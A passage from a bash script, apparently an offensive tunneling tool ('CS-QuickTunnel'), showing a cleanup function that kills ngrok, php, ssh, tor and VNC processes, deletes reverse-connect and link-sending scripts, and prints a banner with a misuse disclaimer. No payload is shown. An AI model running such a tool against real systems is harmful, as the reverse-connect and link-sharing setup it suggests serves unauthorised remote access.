	printf '\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] Or using tinyurl:\e[0m\e[1;77m %s \n' $tiny
	printf "\n"
}

stop() {
# 	Cleaning up your mess
	printf "\nCleaning up services\n"
	checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
	checkphp=$(ps aux | grep -o "php" | head -n1)
	checkssh=$(ps aux | grep -o "ssh" | head -n1)
	checktor=$(ps aux | grep -o "tor" | head -n1)
	if [[ $checkngrok == *'ngrok'* ]]; then
		pkill -f -2 ngrok > /dev/null 2>&1
		killall -2 ngrok > /dev/null 2>&1
	fi
	if [[ $checkphp == *'php'* ]]; then
		pkill -f -2 php > /dev/null 2>&1
		killall -2 php > /dev/null 2>&1
	fi
	if [[ $checkssh == *'ssh'* ]]; then
		pkill -f -2 ssh > /dev/null 2>&1
		killall ssh > /dev/null 2>&1
	fi
	if [[ $checktor == *'tor'* ]]; then
		pkill -f -2 tor > /dev/null 2>&1
		killall tor > /dev/null 2>&1
	fi
	killall socat > /dev/null 2>&1
	killall xterm > /dev/null 2>&1
	killall Xtightvnc > /dev/null 2>&1
	killall -u kalitor
	rm -rf reverse*connect.sh > /dev/null 2>&1
	rm -rf testme.sh > /dev/null 2>&1
	rm -rf sendlink > /dev/null 2>&1
}
	
banner() {
	clear
	printf "\n"
	printf "\e[1;93m    .:.:.\e[0m\e[1;77m Quick Tunneling tool coded by: @InfoSecWriter   \e[0m\e[1;93m.:.:.\e[0m\n"
	printf "\e[1;93m    .:.:.\e[0m\e[1;77m https://github.com/infosecwriter/CS-QuickTunnel \e[0m\e[1;93m.:.:.\e[0m\n"
	printf "\e[1;93m    .:.:.\e[0m\e[1;77m CyberSecrets.org : IntelligentHacking.com       \e[0m\e[1;93m.:.:.\e[0m\n"
	printf "\n"
	printf "  \e[101m\e[1;77m:: Disclaimer: Developers assume no liability and are not    ::\e[0m\n"
	printf "  \e[101m\e[1;77m:: responsible for any misuse or damage caused by user...    ::\e[0m\n"
	printf "\n"
}

banner
startmenu